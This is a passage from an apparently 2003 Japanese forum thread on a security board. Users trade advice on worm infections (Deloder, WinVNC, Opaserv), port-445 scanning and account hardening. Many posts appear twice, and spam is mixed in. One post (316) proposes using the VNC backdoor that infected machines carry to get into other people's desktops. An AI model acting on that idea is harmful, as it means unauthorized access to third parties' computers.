前やのに、なんでや!(あの野郎の足を引っ張ってやる!!)」)
あぼーん
214 :名無しさん@お腹いっぱい。:03/03/08 13:44
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
次の質問どうぞ
↓ ↓ ↓
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
次の質問どうぞ
↓ ↓ ↓
215 :名無しさん@お腹いっぱい。:03/03/08 13:46
>>209-211
>>2
・ノートンを使用して誤反応かな と思う人はこちら
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50
>>2
・ノートンを使用して誤反応かな と思う人はこちら
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50
216 :名無しさん@お腹いっぱい。:03/03/08 14:28
ノートン2003を入れてからウィルス警告が頻発します。
OS:WIN2000SP3
「Backdoor.IRC.Zcrew」「IRC Trojan」「BAT.Trojan」
等です。どうも発生源は「system32」のフォルダみたいなのですが
B'SRecoder等ではシェルを起動すると「mIRCR」と言うソフトが
一緒に起動してしまいます。
感染源のフォルダ考えると再インストールしかないですかね...。
先日LAN接続を止めたのが駄目だったかな。
OS:WIN2000SP3
「Backdoor.IRC.Zcrew」「IRC Trojan」「BAT.Trojan」
等です。どうも発生源は「system32」のフォルダみたいなのですが
B'SRecoder等ではシェルを起動すると「mIRCR」と言うソフトが
一緒に起動してしまいます。
感染源のフォルダ考えると再インストールしかないですかね...。
先日LAN接続を止めたのが駄目だったかな。
217 :名無しさん@お腹いっぱい。:03/03/08 15:25
やっぱりウイルス対策ソフトも相当古くなったウイルスは発見しなくなるんですか?
218 :平野謙:03/03/08 16:10
どもです。あのぉ、W32.Opaserv.K.Wormに感染しんですが
電源を入れるとnoticeと出て、www.bsa.orgのホムペが表れて以後
動かなくなってしまうんですが、どしたら復活するんでしょうか?
おながいしまっす。OSは98です。
電源を入れるとnoticeと出て、www.bsa.orgのホムペが表れて以後
動かなくなってしまうんですが、どしたら復活するんでしょうか?
おながいしまっす。OSは98です。
219 :名無しさん@お腹いっぱい。:03/03/08 16:30
>>218
ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4939
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.opaserv.worm.removal.tool.html
お好きなほうの修復ツールを使ってください。
余談ですが、野球好きですか?
ttp://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=4939
ttp://www.symantec.com/region/jp/sarcj/data/w/w32.opaserv.worm.removal.tool.html
お好きなほうの修復ツールを使ってください。
余談ですが、野球好きですか?
220 :cheshire-cat ◆PhCATJR.v6 :03/03/08 16:30
>>216
Symantec推奨の通り、最新の定義ファイルで、セーフモードで起動してスキャンしたらどうでしょか。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.irc.zcrew.html
>>217
あまりにも古いのは、定義ファイルから外されたりするらしです。
Symantec推奨の通り、最新の定義ファイルで、セーフモードで起動してスキャンしたらどうでしょか。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.irc.zcrew.html
>>217
あまりにも古いのは、定義ファイルから外されたりするらしです。
221 :名無しさん@お腹いっぱい。:03/03/08 23:50
age
222 :名無しさん@お腹いっぱい。:03/03/09 00:49
REDLOFが未だに流行ってるんですが。
しかもトレンドマイクロ社のHP見たらランキング順位上がってるという罠。
しかもトレンドマイクロ社のHP見たらランキング順位上がってるという罠。
223 :ぼるじょあ ◆yBEncckFOU :03/03/09 02:11
そんなこというならバッドトランスだってニムーダだってそれなりに流行ってるYO!
224 :名無しさん@お腹いっぱい。:03/03/09 09:47
age
225 :名無しさん@お腹いっぱい。:03/03/09 11:40
突然445/TCP宛のパケットが沢山来るようになったんだけど、
何か新たにはやってるワームとかってあるのかな?
何か新たにはやってるワームとかってあるのかな?
226 :名無しさん@お腹いっぱい。:03/03/09 11:45
227 :名無しさん@お腹いっぱい。:03/03/09 12:32
>>226
うんこぉぉぉぉぉー
うんこぉぉぉぉぉー
228 :名無しさん@お腹いっぱい。:03/03/09 12:39
229 :名無しさん@お腹いっぱい。:03/03/09 16:36
Winvncが勝手にインストールされて困っています。
WINNT\Fontsディレクトリに
explorer.exe/rundll32.exe/vnchook.dll/omnithread.dll
WINNT\system32ディレクトリに
dvldr32.exeが作成され、
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run
にもキーが書かれていて、
実行ファイル・レジストリともに何度消しても復活してきます。
この症状になってから、通信量が膨大になっているようです。
>>39さんのようにPSEXESVC.EXEがプロセスに存在したので
TROJ_FLOOD.BI.DRかなと思ったのですが、
STDE9.exeは存在せず
シマンテック・ウイルスバスター両方のオンライン検索で全ドライブスキャンしても
何も検出されません。
Winvncというソフトは、今まで使った覚えは全くないです。
HDDをフォーマットしOS再インストしただけの状態でも現れたので
バックアップにまわしている、ファイルだけが置いてある内蔵HDDから経由したのでしょうか。
フォーマット後、バックアップドライブの方は一切さわってなかったのですが・・・。
ていうかメインドライブ3回フォーマットしても出てきやがる(´Д⊂ヽ
WINNT\Fontsディレクトリに
explorer.exe/rundll32.exe/vnchook.dll/omnithread.dll
WINNT\system32ディレクトリに
dvldr32.exeが作成され、
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run
にもキーが書かれていて、
実行ファイル・レジストリともに何度消しても復活してきます。
この症状になってから、通信量が膨大になっているようです。
>>39さんのようにPSEXESVC.EXEがプロセスに存在したので
TROJ_FLOOD.BI.DRかなと思ったのですが、
STDE9.exeは存在せず
シマンテック・ウイルスバスター両方のオンライン検索で全ドライブスキャンしても
何も検出されません。
Winvncというソフトは、今まで使った覚えは全くないです。
HDDをフォーマットしOS再インストしただけの状態でも現れたので
バックアップにまわしている、ファイルだけが置いてある内蔵HDDから経由したのでしょうか。
フォーマット後、バックアップドライブの方は一切さわってなかったのですが・・・。
ていうかメインドライブ3回フォーマットしても出てきやがる(´Д⊂ヽ
度忘れ。環境はWin2kSP3・IE6・CATV接続です。
231 :名無しさん@お腹いっぱい。:03/03/09 17:41
http://www.nai.com/japan/virusinfo/virW2002.asp?v=WinVNC
マカフィーのWinvnc情報には勝手にコピーする云々って書いてあるけど
個人的にはCATV経由って気がしないでもない
マカフィーのWinvnc情報には勝手にコピーする云々って書いてあるけど
個人的にはCATV経由って気がしないでもない
232 :名無しさん@お腹いっぱい。:03/03/09 17:41
詳しくしらないけど、元は遠隔操作用のソフトじゃないかな。
ttp://www.amy.hi-ho.ne.jp/masuda/pc/vnc/index.html
これを改造してウイルスぽくしたものだと思うけど。
これ以上情報を流さないために、とりあえず不必要なポートを閉じるのが先決かと。
あと、
HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
想像だけどこういうレジストリあったら1にするといいかも。
ttp://www.amy.hi-ho.ne.jp/masuda/pc/vnc/index.html
これを改造してウイルスぽくしたものだと思うけど。
これ以上情報を流さないために、とりあえず不必要なポートを閉じるのが先決かと。
あと、
HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
想像だけどこういうレジストリあったら1にするといいかも。
おぉ、同時カキコだ。やっぱウイルスだったのか。
>>231 >>232
ありがとうございますー。
でも、マカフィーのトライアル版でもスキャンしてみたんですけど
何もでてこないんですよねぇ・・・。
今はレジストリ・実行ファイルとも消したまんま出てきてないんで、
また復活してたら試してみまっす。
>>HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
>>想像だけどこういうレジストリあったら1にするといいかも。
これもその時に。
ありがとうございますー。
でも、マカフィーのトライアル版でもスキャンしてみたんですけど
何もでてこないんですよねぇ・・・。
今はレジストリ・実行ファイルとも消したまんま出てきてないんで、
また復活してたら試してみまっす。
>>HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
>>想像だけどこういうレジストリあったら1にするといいかも。
これもその時に。
235 :名無しさん@お腹いっぱい。:03/03/09 21:10
age
236 :http://ura2ch.free-city.net/:03/03/09 23:52
ura2ch ura2ch
237 :名無しさん@お腹いっぱい。:03/03/10 00:07
>>229
俺も全く同じ状況だった。
環境は、win2k・IE6・ADSLです。
dvldr32.exeが一分間に2,300回のアクセスをしてた(鬱
とりあえず、ファイルとレジストリ削除して再起動したら
きちんと消えてたよ。復活したらやだなぁ。
ちょっと前にsdbot.genとIRC.FLOODに感染してたため、
2週間ほど前に駆除してました。関係あるかな?
完全に駆除できるまでは、zoneでブロックしときます・・・。
>>HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
>>想像だけどこういうレジストリあったら1にするといいかも。
\AuthRequiredはありませんでした。
俺も全く同じ状況だった。
環境は、win2k・IE6・ADSLです。
dvldr32.exeが一分間に2,300回のアクセスをしてた(鬱
とりあえず、ファイルとレジストリ削除して再起動したら
きちんと消えてたよ。復活したらやだなぁ。
ちょっと前にsdbot.genとIRC.FLOODに感染してたため、
2週間ほど前に駆除してました。関係あるかな?
完全に駆除できるまでは、zoneでブロックしときます・・・。
>>HKEY_LOCAL_MACHINE\Software\ORL\WinVNC3\AuthRequired
>>想像だけどこういうレジストリあったら1にするといいかも。
\AuthRequiredはありませんでした。
238 :名無しさん@お腹いっぱい。:03/03/10 01:09
S社・T社・N社()製のものは結構ウイルス検出で失敗してます。
詳しくはこちらのサイトご覧下さい・・・(イギリスの独立機関)
ttp://www.virusbtn.com/vb100/archives/tests.xml?200302
ちなみに検出で失敗がないのはVirus Chaserだけだったと思うが・・・
(但しフリーソフトは調査対象外)
詳しくはこちらのサイトご覧下さい・・・(イギリスの独立機関)
ttp://www.virusbtn.com/vb100/archives/tests.xml?200302
ちなみに検出で失敗がないのはVirus Chaserだけだったと思うが・・・
(但しフリーソフトは調査対象外)
239 :名無しさん@お腹いっぱい。:03/03/10 01:11
最近新種のワームに感染しまくり。
いちいち消すのがめんどい。
ワーム糞食らえだよ・・・。
バスター入れてても、あんまり役に立たんよ。
>>229
正直、CATVの環境はやばいと思う。
漏れもそうだが、CATVがかなり狙われてると思う。
おっと、書いてる途中にも感染しやがった・・・。
いちいち消すのがめんどい。
ワーム糞食らえだよ・・・。
バスター入れてても、あんまり役に立たんよ。
>>229
正直、CATVの環境はやばいと思う。
漏れもそうだが、CATVがかなり狙われてると思う。
おっと、書いてる途中にも感染しやがった・・・。
240 :名無しさん@お腹いっぱい。:03/03/10 01:41
age
241 :名無しさん@お腹いっぱい。:03/03/10 08:52
242 :名無しさん@お腹いっぱい。:03/03/10 08:56
243 :名無しさん@お腹いっぱい。:03/03/10 09:41
>>238S社・T社・N社100%になってるが?どこぞの社員さんですか?
244 :名無しさん@お腹いっぱい。:03/03/10 10:39
>>243
そんな解りきった事、もちろん(ry
そんな解りきった事、もちろん(ry
うーめんどいな。。。。
100%という表示は「100%OK」という意味ではありません。
詳細情報はこのページから各商品ごとに見て行ってつかーさい。
S社;http://www.virusbtn.com/vb100/archives/products.xml?symantec.xml
「Overview」 Result summary: 19 passes / 6 fails
T社;http://www.virusbtn.com/vb100/archives/products.xml?trend.xml
「Overview」 Result summary: 4 passes / 7 fails
N社:http://www.virusbtn.com/vb100/archives/products.xml?nai.xml
「Overview」 Result summary: 10 passes / 16 fails
英語表示だからメンドイケドよく読んでね。
(もしかしてそちらが上記3社のうちの社員さん?)
100%という表示は「100%OK」という意味ではありません。
詳細情報はこのページから各商品ごとに見て行ってつかーさい。
S社;http://www.virusbtn.com/vb100/archives/products.xml?symantec.xml
「Overview」 Result summary: 19 passes / 6 fails
T社;http://www.virusbtn.com/vb100/archives/products.xml?trend.xml
「Overview」 Result summary: 4 passes / 7 fails
N社:http://www.virusbtn.com/vb100/archives/products.xml?nai.xml
「Overview」 Result summary: 10 passes / 16 fails
英語表示だからメンドイケドよく読んでね。
(もしかしてそちらが上記3社のうちの社員さん?)
246 :名無しさん@お腹いっぱい。:03/03/10 14:02
Winvnc漏れもインスコされますた。
環境は、やはりWin2k
しつこくインストを要求されるので思わずokを押してしまった。
実行後、アプリケーションの追加と削除でアンインストールできるみたい。
どの程度クリーンになるのかは不明
環境は、やはりWin2k
しつこくインストを要求されるので思わずokを押してしまった。
実行後、アプリケーションの追加と削除でアンインストールできるみたい。
どの程度クリーンになるのかは不明
247 :名無しさん@お腹いっぱい。:03/03/10 14:03
【奇跡よ、】田代まさしを1位にしよう!【再び!】
春の訪れを感じる今日この頃、皆様にはますますご健勝のことと思います。
さて、この度、我が2ちゃんねる祭り板において、下記のような祭りを開催いたしており、
皆様にも援助をしていただきたく、依頼に参った次第であります。
何卒、よろしくお願い申し上げます。
★21世紀偉人投票所★
http://m2ok1.no-ip.com/vote/tvote.cgi?event=vote1
春の訪れを感じる今日この頃、皆様にはますますご健勝のことと思います。
さて、この度、我が2ちゃんねる祭り板において、下記のような祭りを開催いたしており、
皆様にも援助をしていただきたく、依頼に参った次第であります。
何卒、よろしくお願い申し上げます。
★21世紀偉人投票所★
http://m2ok1.no-ip.com/vote/tvote.cgi?event=vote1
248 :名無しさん@お腹いっぱい。:03/03/10 14:14
私もDELODERに感染してました。
>>237さんと同様で、環境は、win2k・IE6・ADSLです。
先週、IRC.FLOODに感染してました。何か関係が有るのでしょうか?
私はバスター入れてますが、気付いたときはinst.exeとexplorerが
常駐してまして、ちょっと焦りました。
>>237さんと同様で、環境は、win2k・IE6・ADSLです。
先週、IRC.FLOODに感染してました。何か関係が有るのでしょうか?
私はバスター入れてますが、気付いたときはinst.exeとexplorerが
常駐してまして、ちょっと焦りました。
249 :名無しさん@お腹いっぱい。:03/03/10 16:21
DELODER うざいね。
445 (Direct Hosting) を定期的に飛ばしている馬鹿がいたけど、
先週末から急に増えたんで、「また、Windows でなんかはやってんなぁ」と思ってた。
おれ ybb だけど、この 36 時間で外部からコネクトしてくるパケットの
144 / 738 (19.51)% が 445 だ。
まぁ先週は ybb 内で broadcast や multicast 飛ばしててる香具師が多かったから
実際はほとんどが DELODER だね。
445 (Direct Hosting) を定期的に飛ばしている馬鹿がいたけど、
先週末から急に増えたんで、「また、Windows でなんかはやってんなぁ」と思ってた。
おれ ybb だけど、この 36 時間で外部からコネクトしてくるパケットの
144 / 738 (19.51)% が 445 だ。
まぁ先週は ybb 内で broadcast や multicast 飛ばしててる香具師が多かったから
実際はほとんどが DELODER だね。
250 :名無しさん@お腹いっぱい。:03/03/10 16:34
あ、ほんとだ凄い
日ごろログなんか見てないから気にしてなかったけど445がいっぱい
137の時はYBBで蚊帳の外だったから少し嬉しい
日ごろログなんか見てないから気にしてなかったけど445がいっぱい
137の時はYBBで蚊帳の外だったから少し嬉しい
251 :l:03/03/10 16:35
http://www.pink-angel.jp/betu/linkvp2/linkvp.html
★その目で確認すべし!!★超おすすめ★
★その目で確認すべし!!★超おすすめ★
252 :名無しさん@お腹いっぱい。:03/03/10 16:36
137も相変わらず多いが445はもっと多くなったな。
253 :名無しさん@お腹いっぱい。:03/03/10 16:37
445大漁!
254 :名無しさん@お腹いっぱい。:03/03/10 16:43
>>249
YBBって…オマエ、その時点で
YBBって…オマエ、その時点で
255 :名無しさん@お腹いっぱい。:03/03/10 17:12
やたらと同プロバイダから来ていた137がぴたっと止まった。
やっと気づいたのか?
で、皆様と同じように445が来てます。
同じIPが3回連続(希に2回)で叩いてくるな。
やっと気づいたのか?
で、皆様と同じように445が来てます。
同じIPが3回連続(希に2回)で叩いてくるな。
256 :名無しさん@お腹いっぱい。:03/03/10 17:15
うちは2回ワンセット、ポートスキャンと通信の要求。
みんなウリナラからだけど。
みんなウリナラからだけど。
257 :名無しさん@お腹いっぱい。:03/03/10 17:31
>>255-256
TCPなんだから連続しても何の不思議も無い。
TCPなんだから連続しても何の不思議も無い。
258 :名無しさん@お腹いっぱい。:03/03/10 17:56
つまり、
・ポート445が開いてて
・ユーザ名Administratorが有効で
・パスワードが簡単なヤツ
が危険ってことでいいですか?
・ポート445が開いてて
・ユーザ名Administratorが有効で
・パスワードが簡単なヤツ
が危険ってことでいいですか?
259 :名無しさん@お腹いっぱい。:03/03/10 18:10
>>258
Administratorの名前変えてる香具師なんているの?
Administratorの名前変えてる香具師なんているの?
260 :名無しさん@お腹いっぱい。:03/03/10 18:12
俺変えてる
261 :名無しさん@お腹いっぱい。:03/03/10 18:15
標準の名前をそのまま使ってるのは危険
262 :名無しさん@お腹いっぱい。:03/03/10 18:33
変えるのが普通だろ
263 :名無しさん@お腹いっぱい。:03/03/10 18:35
既知のadministratorは変えるのが鉄則、当然パスワードも設定。
アカウント名もパスワードも簡単な単語等は厳禁。
アカウント名もパスワードも簡単な単語等は厳禁。
264 :名無しさん@お腹いっぱい。:03/03/10 18:43
>>261-263
漏れはAdminでログインする事なんて滅多に無いから複雑で長いパス設定して終わり。
漏れはAdminでログインする事なんて滅多に無いから複雑で長いパス設定して終わり。
>>254
別に家で使うんだったら問題ないぜ。俺はね。
会社で B-Flet's + so-net だけど、やってくるパケットは似たようなもん。
むしろ、so-net の方は net-bios 絡みがガンガンくるね。
両方とも LinuxBox で Netfilter を利用した router を構築してるよ。
# 今は会社の管理権限がないけどな。
別に家で使うんだったら問題ないぜ。俺はね。
会社で B-Flet's + so-net だけど、やってくるパケットは似たようなもん。
むしろ、so-net の方は net-bios 絡みがガンガンくるね。
両方とも LinuxBox で Netfilter を利用した router を構築してるよ。
# 今は会社の管理権限がないけどな。
266 :名無しさん@お腹いっぱい。:03/03/10 19:22
貼っとく
Tips for Windows
Administratorアカウントの名称を変更する
http://www.zdnet.co.jp/help/tips/windows/w0523.html
Tips for Windows
Administratorアカウントの名称を変更する
http://www.zdnet.co.jp/help/tips/windows/w0523.html
267 :名無しさん@お腹いっぱい。:03/03/10 20:41
age
268 :ぽるじょあ ◆yBEncckFOU :03/03/10 21:21
>>261-263
(・3・) エェー
朕はAdminでログインする事なんて滅多に無いYO−
その代わりいつものアカウントはフル権限にしてるYO−
その代わりパスは英数字16文字だYO−
NTLMハッシュ抜いて解きたいしとは、気長に待つか、分散コンプユーテングでもしてNE
(・3・) エェー
朕はAdminでログインする事なんて滅多に無いYO−
その代わりいつものアカウントはフル権限にしてるYO−
その代わりパスは英数字16文字だYO−
NTLMハッシュ抜いて解きたいしとは、気長に待つか、分散コンプユーテングでもしてNE
269 :484:03/03/10 21:23
BKDR_DOMWIS.Aというウィルスに感染してしまったようなのですが、
以下のURLの通りレジストリの値を削除して再起動したのですが、
感染源の実行ファイルを削除できません。どうしたら良いのでしょう?
(´Д⊂グスン
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DOMWIS.A
以下のURLの通りレジストリの値を削除して再起動したのですが、
感染源の実行ファイルを削除できません。どうしたら良いのでしょう?
(´Д⊂グスン
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_DOMWIS.A
270 :名無しさん@お腹いっぱい。:03/03/10 21:25
>>269
OSは?削除できないファイルのパスは?
OSは?削除できないファイルのパスは?
271 :264ぼるじょあ ◆yEbBEcuFOU :03/03/10 21:42
>>268
(・3・) オゥ 一緒だYO
(・3・) オゥ 一緒だYO
272 :名無しさん@お腹いっぱい。:03/03/10 21:43
>>269
それ良く出来てるね。
XPのホームなんてパス設定しないで入れてるヤシ多いし。むしろそこが狙い目かにょ。
漏れの友達もパス忘れるの嫌がって設定してないし。。。
つか、組み込みパスリストの中に、「2600」有るのは藁ったぢょ。
XPのホームってデフォルトでADMINアカウント組み込んで有るらしいけど、それって
デフォルトでもリモートからログイン許してるの?
それ良く出来てるね。
XPのホームなんてパス設定しないで入れてるヤシ多いし。むしろそこが狙い目かにょ。
漏れの友達もパス忘れるの嫌がって設定してないし。。。
つか、組み込みパスリストの中に、「2600」有るのは藁ったぢょ。
XPのホームってデフォルトでADMINアカウント組み込んで有るらしいけど、それって
デフォルトでもリモートからログイン許してるの?
273 :名無しさん@お腹いっぱい。:03/03/10 21:49
でろだー
でないだー
でないだー
274 :225:03/03/10 21:53
>>228 返事遅くなりました。どうもありがとう!
275 :484:03/03/10 21:54
277 :264ぼるじょあ ◆yEbBEcuFOU :03/03/10 22:05
>>272
(・3・) エェー セーフモードと回復コンソールでしかログイン出来なかった気がするYO
(・3・) エェー セーフモードと回復コンソールでしかログイン出来なかった気がするYO
278 :名無しさん@お腹いっぱい。:03/03/10 22:13
>>276
そうなのでつか。安心でつ。
デホルトのアカウントだとむしろw2Kの方が怖いのでつか。
つか、XPでもパス空白にしてれば同じでつか。
>272は思わずDELODER_Aと勘違いしてカキコしてしまいました。>>269と全然関係ないね。欝。
そうなのでつか。安心でつ。
デホルトのアカウントだとむしろw2Kの方が怖いのでつか。
つか、XPでもパス空白にしてれば同じでつか。
>272は思わずDELODER_Aと勘違いしてカキコしてしまいました。>>269と全然関係ないね。欝。
>>277でした
欝欝。
欝欝。
445 をブロックしました。 詳細:
インバウンド TCP 接続
ローカルアドレス、 サービスは 64.119.215.116,445
リモートアドレス、 サービスは 218.24.69.17,3803
210.220.67.147 219.140.141.114
203.69.17.70 210.111.21.97
203.185.20.140 61.102.14.60
218.113.116.10 211.154.210.45
24.29.132.253 211.242.7.111
210.127.217.158 218.162.28.128
インバウンド TCP 接続
ローカルアドレス、 サービスは 64.119.215.116,445
リモートアドレス、 サービスは 218.24.69.17,3803
210.220.67.147 219.140.141.114
203.69.17.70 210.111.21.97
203.185.20.140 61.102.14.60
218.113.116.10 211.154.210.45
24.29.132.253 211.242.7.111
210.127.217.158 218.162.28.128
282 :名無しさん@お腹いっぱい。:03/03/10 23:29
ポート445スレはここでいいのか?
283 :名無しさん@お腹いっぱい。:03/03/10 23:36
デロダーについての質問なのですが、
どのパスワード使って侵入するんですか?
フリーメールのパスワードとか、
懸賞応募のパスワードとかでも
侵入されるんでしょうか…?
どのパスワード使って侵入するんですか?
フリーメールのパスワードとか、
懸賞応募のパスワードとかでも
侵入されるんでしょうか…?
284 :484:03/03/10 23:36
何故か再起動かけてもRUNDLL16.EXEのレジストリが
復活してしまいます。。・゚・(ノД`)・゚・。 うえええん
復活してしまいます。。・゚・(ノД`)・゚・。 うえええん
285 :名無しさん@お腹いっぱい。:03/03/11 00:07
>>283
sex
sex
286 :名無しさん@お腹いっぱい。:03/03/11 00:17
sax
287 :名無しさん@お腹いっぱい。:03/03/11 00:27
288 :名無しさん@お腹いっぱい。:03/03/11 00:32
>>287
肛門
肛門
289 :名無しさん@お腹いっぱい。:03/03/11 00:39
探したけどありませんでした。
290 :名無しさん@お腹いっぱい。:03/03/11 00:46
肛門になかった?奥まで探したのか?
gpedit.msc
secpol.msc
mmc
gpedit.msc
secpol.msc
mmc
291 :名無しさん@お腹いっぱい。:03/03/11 01:19
Antidoteで毎日更新しようとしても、
開いたページが真っ白、何もない状態なんですが。
開いたページが真っ白、何もない状態なんですが。
292 :名無しさん@お腹いっぱい。:03/03/11 01:47
>>287
safeモードで起動しる
safeモードで起動しる
293 :ぼるじょあ ◆yEbBEcuFOU :03/03/11 02:01
>>289
(・3・) エェー HomeEditionだRO〜 ProにしかないYO
(・3・) エェー HomeEditionだRO〜 ProにしかないYO
294 :名無しさん@お腹いっぱい。:03/03/11 02:47
デロダーってファイル共有サービスにログインしてスタートアップにトロイ置くだけ?
295 :名無しさん@お腹いっぱい。:03/03/11 02:55
296 :名無しさん@お腹いっぱい。:03/03/11 07:15
教えて下さい(OSはMEです)お願いします。
何かPCの調子が最近おかしいので、システムの復元をしようと思ったら
今までは復元ポイントがいくつもあったのに(カレンダーみたいに)
今はポイントが一つも無いんです(カレンダー自体ない、選択できない)
しかもこの日に対して復元ポイントがありませんと書いてある上には
< 1899年12月30日 >
こんな感じになってます。
1899年????
左右の矢印みたいなの押してもだめ
最近ウイルスに感染してたみたいでJS_EXCEPTION.GENとHTML_SUAR.Aに
感染してたのですが関係あるのでしょうか?
他にもウイルスあったけど忘れてしまいました。
ウイルスが元で復元ポイントがおかしくなるとかありますか?
何かPCの調子が最近おかしいので、システムの復元をしようと思ったら
今までは復元ポイントがいくつもあったのに(カレンダーみたいに)
今はポイントが一つも無いんです(カレンダー自体ない、選択できない)
しかもこの日に対して復元ポイントがありませんと書いてある上には
< 1899年12月30日 >
こんな感じになってます。
1899年????
左右の矢印みたいなの押してもだめ
最近ウイルスに感染してたみたいでJS_EXCEPTION.GENとHTML_SUAR.Aに
感染してたのですが関係あるのでしょうか?
他にもウイルスあったけど忘れてしまいました。
ウイルスが元で復元ポイントがおかしくなるとかありますか?
297 :296:03/03/11 07:32
追記です
復元ポイントを作成しようとしたら
復元ポイントの作成に失敗しましたとの文がでました。
どうかお願いします。
復元ポイントを作成しようとしたら
復元ポイントの作成に失敗しましたとの文がでました。
どうかお願いします。
298 :名無しさん@お腹いっぱい。:03/03/11 08:04
ない。
299 :296:03/03/11 08:13
回答有難う御座います
300 :(´-ω-`):03/03/11 08:16
しゃれたサイトだ
http://homepage3.nifty.com/digikei/ten.html
∧..∧
キタ━━━━━━( ´Д`) ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
'/ / \ __  ̄ ̄ ̄ ̄ ̄ ̄_____
/ / . \ __ ______
,.,..,.、,,,,/ /、,\ . )..,_ /i
;' ´Д`(ノ,:、,/ /:,.:::: ::`゛:.:゛:`''':,'.´ -‐i  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
'、 ;: ...: ,:. :.:.:.\ \ _;.;;..; :..‐'゛  ̄  ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
`"゛"゛' ''`゛ `'(___)
http://homepage3.nifty.com/digikei/ten.html
∧..∧
キタ━━━━━━( ´Д`) ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
'/ / \ __  ̄ ̄ ̄ ̄ ̄ ̄_____
/ / . \ __ ______
,.,..,.、,,,,/ /、,\ . )..,_ /i
;' ´Д`(ノ,:、,/ /:,.:::: ::`゛:.:゛:`''':,'.´ -‐i  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
'、 ;: ...: ,:. :.:.:.\ \ _;.;;..; :..‐'゛  ̄  ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
`"゛"゛' ''`゛ `'(___)
ポート445って塞いでもイイの?
302 :名無しさん@お腹いっぱい。:03/03/11 08:54
共有せんのやったら(・∀・)イイ!
303 :名無しさん@お腹いっぱい。:03/03/11 08:58
OSって入れ替えると、今パソに入ってるデータ全部消えるの?
304 :名無しさん@お腹いっぱい。:03/03/11 09:08
305 :bloom:03/03/11 09:17
306 :名無しさん@お腹いっぱい。:03/03/11 10:07
DELODERの件だけど、WindowsXPのHEは普通に使っている限り
Adminアカウントは「制限のため入れない」みたいな警告でて
ログインできない。だから感染しないみたいだが、実際どうなんだろな。
逆にセーフモードで起動した状態だとAdminで入れるんだよな。
DELODERがあれば実験してみるところだが、持ってないのでできん。
Adminアカウントは「制限のため入れない」みたいな警告でて
ログインできない。だから感染しないみたいだが、実際どうなんだろな。
逆にセーフモードで起動した状態だとAdminで入れるんだよな。
DELODERがあれば実験してみるところだが、持ってないのでできん。
307 :名無しさん@お腹いっぱい。:03/03/11 10:26
で、デロダに感染したってやつに聞きたいんだけど、
やっぱり簡単なパスを使っていたの?
やっぱり簡単なパスを使っていたの?
308 :名無しさん@お腹いっぱい。:03/03/11 10:43
>>307
トレンドマイクロにでろだが使うパス一覧がある。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_DELODER.A&VSect=T
さて問題です。
トレンドマイクロは不正アクセス禁止法に違反ではないのでしょうか?
どのホストと指定しないからセーフかな?
トレンドマイクロにでろだが使うパス一覧がある。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_DELODER.A&VSect=T
さて問題です。
トレンドマイクロは不正アクセス禁止法に違反ではないのでしょうか?
どのホストと指定しないからセーフかな?
309 :名無しさん@お腹いっぱい。:03/03/11 12:19
310 :名無しさん@お腹いっぱい。:03/03/11 13:13
age
311 :tb:03/03/11 13:56
312 :名無しさん@お腹いっぱい。:03/03/11 14:38
ということはadminアカウントにパスワード設定すれば
デロダーは防げるということか。
デロダーは防げるということか。
313 :名無しさん@お腹いっぱい。:03/03/11 16:17
すいません、出ろ基地下さい。
314 :名無しさん@お腹いっぱい。:03/03/11 20:13
出ろ基地などというものはない。
315 :名無しさん@お腹いっぱい。:03/03/11 21:52
デロダーにかかったヤシはこっちも見ると吉
【IT】パスワード甘いPCに侵入 新種ウィルスに感染警報
http://news2.2ch.net/test/read.cgi/newsplus/1047295113/
【IT】パスワード甘いPCに侵入 新種ウィルスに感染警報
http://news2.2ch.net/test/read.cgi/newsplus/1047295113/
316 :名無しさん@お腹いっぱい。:03/03/11 22:13
で、デロダでVNC入れられたヤツ
VNCのポートは何番だった?パスワードは?
445にパケ送ってくる奴のデスクトップで遊べるかもしれん
VNCのポートは何番だった?パスワードは?
445にパケ送ってくる奴のデスクトップで遊べるかもしれん
317 :名無しさん@お腹いっぱい。:03/03/11 23:43
